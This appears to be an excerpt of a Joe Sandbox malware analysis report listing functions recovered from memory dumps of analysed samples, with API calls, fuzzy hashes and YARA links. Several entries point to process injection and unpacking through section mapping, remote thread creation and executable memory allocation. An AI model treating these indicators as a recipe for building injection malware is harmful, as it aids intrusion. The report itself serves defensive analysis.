Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: 57833c263c5f50e1f76ba567701c767fe6a27f7dbd11787905c871fa0a9533d9
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: 03B15A329202869FDB15EF68C8417BEBBE5EF55300F3481AAD489EB341D6348D91CB60

Function 0024BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0024BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 0024BB14
_xtime_get.LIBCPMT ref: 0024BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 0024BB43

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 0ab569c888e8975e3ada975230ec98504c978dcfe793df263f142440bcf7a431
Instruction ID: 1ccfcea1c29760f224666a54db75b4e474192b596b8a94cbb8672ae708b17d9c
Opcode Fuzzy Hash: 0ab569c888e8975e3ada975230ec98504c978dcfe793df263f142440bcf7a431
Instruction Fuzzy Hash: 97217F75A11119AFDF49EFA8DC859BEBBB8EF08314F100025F901B7261DB74AD118FA1

Function 00247040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 0024726C

Strings

@.#, xrefs: 00247250
`z$, xrefs: 00247282

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: @.#$`z$
API String ID: 3366076730-3975421297
Opcode ID: 1b355d930819f260f7330c3bca2c44fae07153a354c7d798423b0480d93b69d2
Instruction ID: eab6edb30228254d353380ceaa08513617070d6bc3886467d9e894461bd49a03
Opcode Fuzzy Hash: 1b355d930819f260f7330c3bca2c44fae07153a354c7d798423b0480d93b69d2
Instruction Fuzzy Hash: D9A136B4E116198FDB25CFA8C88479EBBF1BF48710F19819AE819AB351E7759D01CF80

Function 00248E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 197COMMON

Download Yara Rule

Strings

P##, xrefs: 0023246D
P##, xrefs: 00232486

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: P##$P##
API String ID: 0-3871474767
Opcode ID: 32d351006a68979d04bee88aba70fc0942ab0dda9961a68e223b0b0888a188d2
Instruction ID: ab9d6c6fa0f8a21f00ac08b9217006d4815a953e24d38e8e6afaa78124499f55
Opcode Fuzzy Hash: 32d351006a68979d04bee88aba70fc0942ab0dda9961a68e223b0b0888a188d2
Instruction Fuzzy Hash: A3512972A301099BCB19EFA8DC41A6EB7A9EF44300F510669F905DB341EB70EE749BD1

Function 0026F21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0026F263

Strings

`'), xrefs: 0026F235
8"), xrefs: 0026F30B

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8")$`')
API String ID: 3903695350-2141520963
Opcode ID: 257f995334ba4aa6038c569b7066e1f23e9297afe8ce43c1099f90e373bb7b58
Instruction ID: d96e1e1ce22136e1eec22d532f0fe91a6633738e49fc496dfcc869b86fb25615
Opcode Fuzzy Hash: 257f995334ba4aa6038c569b7066e1f23e9297afe8ce43c1099f90e373bb7b58
Instruction Fuzzy Hash: A9313B316213069FEF61AF78EA45B5A73E9AF40310F14446AE85AE7251DF71ACF08F11

Function 00233930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 00233962
__Mtx_init_in_situ.LIBCPMT ref: 002339A1

Strings

pB#, xrefs: 00233940

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: pB#
API String ID: 3366076730-3415797175
Opcode ID: e938746f85e798a6a470463516363c485f1abb59c8f756f4d8338462fa537118
Instruction ID: fccedac07b1f392c7141f1150554ae5607713b7b74303b020bd093cee0141a43
Opcode Fuzzy Hash: e938746f85e798a6a470463516363c485f1abb59c8f756f4d8338462fa537118
Instruction Fuzzy Hash: BC4115B4601B069FD720CF19C588B5ABBF4FF44315F148619E86A8B341E7B5EA25CF80

Function 00232440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0023247E

Strings

P##, xrefs: 0023246D
P##, xrefs: 00232486

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P##$P##
API String ID: 2659868963-3871474767
Opcode ID: 7994a4f35b23feefc3463db14cbabf4738fb21b85675e3054a3c2c63539ebfc3
Instruction ID: 945d989fcd94b428cbe5037280989543c7901d0789e6b3a4839e843e9624c24b
Opcode Fuzzy Hash: 7994a4f35b23feefc3463db14cbabf4738fb21b85675e3054a3c2c63539ebfc3
Instruction Fuzzy Hash: D4F0E5B6D3030C6BC714FFE8D841889B3ACDE15300B008A25F644E7540F770FA688BA1

Function 00232520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00232552

Strings

P##, xrefs: 0023255D
P##, xrefs: 00232547

Memory Dump Source

Source File: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.3271785430.0000000000230000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271829557.0000000000292000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271953461.0000000000299000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000029B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.00000000004F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.0000000000527000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000052F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3271989108.000000000053E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3272775074.000000000053F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273086663.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3273142777.00000000006DD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_230000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P##$P##
API String ID: 2659868963-3871474767
Opcode ID: ec82668dde0f58ee4d3cdc74194046b4a3977f434c8efc6979c4ad246d206f4e
Instruction ID: 9e9608ce847f82bba81e0cebaa34673088b92bb0cfe90dfb1eee7e4fd88ec4ed
Opcode Fuzzy Hash: ec82668dde0f58ee4d3cdc74194046b4a3977f434c8efc6979c4ad246d206f4e
Instruction Fuzzy Hash: E1F0A775D2120DEBC714DFA8D84198EFBF8AF55300F1082AEE44467240EB715A68CFD9

Analysis Process: 2.exePID: 5272, Parent PID: 5720COMMON

Execution Graph

Execution Coverage:	7.2%
Dynamic/Decrypted Code Coverage:	53.5%
Signature Coverage:	8.8%
Total number of Nodes:	114
Total number of Limit Nodes:	5

Executed Functions

Function 004014ED Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401591
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015BE
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015E1
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FF
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401640
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401671
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401693

Memory Dump Source

Source File: 00000008.00000002.2805606968.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_2.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 9e14676518553f6f85982dcbf3afacf75dc2e7edcaafa4c3f22e426a2637a743
Instruction ID: a0f923ac19c666167df48063321c4602211009b813072724e4813c1f8ecc7b72
Opcode Fuzzy Hash: 9e14676518553f6f85982dcbf3afacf75dc2e7edcaafa4c3f22e426a2637a743
Instruction Fuzzy Hash: 5D513AB5900249BFEB209F91CC49FEFBBB8EF85B00F144159FA11AA2E5D7749900CB64

Function 00401502 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401591
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015BE
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015E1
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015FF
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401640
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401671
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401693

Memory Dump Source

Source File: 00000008.00000002.2805606968.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_2.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 9e63b9ecfe4be7d8a7ba3d3b08fda1f99a0379ccf72b5c629092d1d541f395c9
Instruction ID: a913b1e40e633c8f85971ebcf252a8577c60a808f24cefbb668ada93ab985593
Opcode Fuzzy Hash: 9e63b9ecfe4be7d8a7ba3d3b08fda1f99a0379ccf72b5c629092d1d541f395c9
Instruction Fuzzy Hash: 82512975900245BBEF209F91CC48F9FBFB9FF85B00F144159FA11AA2A5D7709944CB24

Function 00402FA2 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030D6
NtTerminateProcess.NTDLL ref: 004030EF

Memory Dump Source

Source File: 00000008.00000002.2805606968.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_2.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 686d0bbd8fbbb0e36e9062dede5509d684d0615e631ce9e79984e2ae00ef09bd
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: D8412531618E084FD7A8EE5CA845B6277D1E798311F6643BAE809D3389EB34D85187C5

Function 02483D92 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02483DBA
Module32First.KERNEL32(00000000,00000224), ref: 02483DDA

Memory Dump Source

Source File: 00000008.00000002.2807030321.000000000247D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0247D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_247d000_2.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 3087fe15c94dab5352afc871bdfb6561b7f271386cbb16a0796b36a24e33c261
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: EFF09635610714BBD7203FF59C8CBAF7AECAF49A25F1005AAF646911C0EB74E8454A61

Function 025C003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 025C024D

Strings

kernel32.dll, xrefs: 025C008F, 025C0095
cess, xrefs: 025C018D

Memory Dump Source

Source File: 00000008.00000002.2807137209.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_25c0000_2.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: af46a7b1053d2c9e713af16fa4a0a761e52bab4d481831d59464f6450bf78e74
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 8D525A74A01229DFDB64CF98C984BACBBB1BF09314F1480D9E54DAB391DB30AA95CF14

Function 025C0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,025C0223,?,?), ref: 025C0E19
SetErrorMode.KERNELBASE(00000000,?,?,025C0223,?,?), ref: 025C0E1E

Memory Dump Source

Source File: 00000008.00000002.2807137209.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_25c0000_2.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 8e163a6ca1c0b8d4db6a69ec2764d182ebcb414e293157034c26684c81b477c4
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: A2D01231145128B7D7003AD4DC09BCD7F1CDF05B66F108011FB0DD9080C770954046E9

Function 004018AB Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,0000001B), ref: 004018FC

Memory Dump Source

Source File: 00000008.00000002.2805606968.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_2.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 62342a240628b0d91fda0c5fc5898d72e4a3770bfe4db2c8e1da4b5d333e2b31
Instruction ID: a6957e600d0f380cc1a49893a0184640c9060dab0068a80971e976a9841fdc98
Opcode Fuzzy Hash: 62342a240628b0d91fda0c5fc5898d72e4a3770bfe4db2c8e1da4b5d333e2b31
Instruction Fuzzy Hash: EF115EB2608204E7DB007A959D91EAB36689B01754F208137F647791F0D67D9A13F36F

Function 004018C6 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,0000001B), ref: 004018FC

Memory Dump Source

Source File: 00000008.00000002.2805606968.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_2.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c6b8480d6387d0be74c2680a15768c262fdc67a811919eec1ccb962c6c8c5b1d
Instruction ID: 3a2f5c81bf18647ea8bd665c29415133ba78c7124c14d0eb25db08ac19f46a69
Opcode Fuzzy Hash: c6b8480d6387d0be74c2680a15768c262fdc67a811919eec1ccb962c6c8c5b1d
Instruction Fuzzy Hash: EB017CB6208204E7DB006A919C91ABA3265AB05354F308137F6177A1F1C67D9A13F72F

Function 004018CD Relevance: 1.3, APIs: 1, Instructions: 50
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,0000001B), ref: 004018FC

Memory Dump Source

Source File: 00000008.00000002.2805606968.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_2.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 890295bbc16400368607f1de220e790211fe13653597608cb550117026bfe186
Instruction ID: 7e018f6509b8d0532dd07cdca70325d7c1967a61a895c16753a8143af92e3fd0
Opcode Fuzzy Hash: 890295bbc16400368607f1de220e790211fe13653597608cb550117026bfe186
Instruction Fuzzy Hash: A201B1B6208104EBDB006AA19C91AAA3764AB01310F208137F603791F1C67D9A13F71F

Function 004018D6 Relevance: 1.3, APIs: 1, Instructions: 50
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,0000001B), ref: 004018FC

Memory Dump Source

Source File: 00000008.00000002.2805606968.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_2.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b92cde3abd3b86c5d980f544a787a9edbba97fa7641ef297bd4bd351ee4e25a2
Instruction ID: 5391eea9082683735aba9ad5b562b700e5afefe09d2a5623585dd913bf2439bc
Opcode Fuzzy Hash: b92cde3abd3b86c5d980f544a787a9edbba97fa7641ef297bd4bd351ee4e25a2
Instruction Fuzzy Hash: 96018FB6208204E7DB006A919C91EAA3265AB05350F308137F607791F1C67D9A13F72F

Function 02483A51 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02483AA2

Memory Dump Source

Source File: 00000008.00000002.2807030321.000000000247D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0247D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_247d000_2.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 50b40ab1be328a5315f62beeb8969d1a4d1f259e6e5d6b99bc3a691c616ea9e5
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 98112A79A00208EFDB01DF99C985E99BFF5AB08750F058095F9489B361D371EA50DF80

Function 004018DD Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,0000001B), ref: 004018FC

Memory Dump Source

Source File: 00000008.00000002.2805606968.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_2.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c898aab9a60dacec9cb8d3c551f958221e1a8305c36d4b70a738d42624c2cfe0
Instruction ID: 902ef340cd8b3ef667722f9b3bcd4aee67b167148464105025906d49d211b71e
